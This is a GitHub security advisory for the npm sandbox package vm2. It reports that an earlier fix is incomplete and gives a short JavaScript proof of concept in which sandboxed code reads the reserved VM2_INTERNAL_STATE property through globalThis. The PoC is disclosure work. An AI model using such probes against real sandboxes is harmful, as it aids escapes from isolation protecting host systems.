MEDIUM 5.3 npm
vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`
GHSA-2cm2-m3w5-gp2f
Published · Modified
Description
Summary
The issue reported in https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.
Details
It is still possible to get access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`.
PoC
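```js
const {VM} = require("vm2");
const vm = new VM();
// Look up the reserved name as a string-keyed property of globalThis inside
// the sandbox and print whatever is returned to the host.
console.log(vm.run(`
globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
`));
```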